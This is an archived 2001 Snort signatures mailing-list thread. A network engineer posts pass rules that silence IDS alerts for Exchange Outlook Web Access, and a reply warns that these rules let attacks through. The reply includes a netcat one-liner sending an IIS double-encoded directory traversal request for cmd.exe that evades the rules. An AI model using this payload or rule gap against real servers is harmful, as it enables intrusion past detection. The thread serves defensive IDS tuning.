[Snort-sigs] Exchange OWA Pass Rules

Joao Gouveia jgouveia at ...111...
Thu Oct 25 03:10:10 EDT 2001


echo 'GET /exchweb/../scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe'
|netcat your.host.com 80
This will get "passed" on snort.
Off course no one is suposed to know how your rules are configured but
still...

Regards,

Joao Gouveia


----- Original Message -----
From: "Cessna, Michael" <MCessna at ...153...>
To: <snort-sigs at lists.sourceforge.net>
Sent: Wednesday, October 24, 2001 8:57 PM
Subject: [Snort-sigs] Exchange OWA Pass Rules


> Here's a copy of the rules that keep MS Exchange OWA from driving you nuts
> with alerts. Since OWA runs on MS IIS......Be careful to make sure that
the
> OWA server is FULLY patched!
>
>
############################################################################
> ##
> #Pass Rules for Exchange Outlook Web Access
> #
> #First a new variable needs to be set in your snort.conf file
> #to define the OWA servers
> #var OWA_SERVERS 192.168.1.1/32
> #or for multiple OWA servers
> #var OWA_SERVERS [192.168.1.1/32,192.168.2.2/32]
> #using the OWA_SERVERS variable lets you pass the packets destined for
your
> OWA
> #servers while keeping the regular rules to protect your other nodes
> #Make sure that you use the -o switch so that Snort processes the pass
> #rules before the other rules
> #
> #NOTE: These rules are for OWA and Exchange on the same box.
> #I have tested the rules with Exchange 5.5sp4 and Exchange2000
> #MS IIS 5.0 was used as the webserver for both 5.5 and 2k
> #If I get some time I'll try to separate out the webserver from Exchange
> #And see if the rules need to be changed.
> #Please send any changes/updates/
> pass tcp $EXTERNAL_NET any -> $OWA_SERVERS 80 (msg:"WEB-MISC webdav search
> access by Exchange OWA"; flags: A+; uricontent: "/exchange"; nocase;)
> pass tcp $EXTERNAL_NET any -> $OWA_SERVERS 80 (msg:WEB-CGI Calendar access
> by Exchange OWA"; flags: A+; uricontent: "/exchweb"; nocase;)
>
> Michael Cessna
> Network Engineer
> RealTime Media
> 308 Lancaster Ave.
> Wynnewood, PA 19096
> p.610-896-9400 x308
> f.610-896-9416
> mcessna at ...153...
> www.realtimemedia.com
> www.rtm.com
>
>





More information about the Snort-sigs mailing list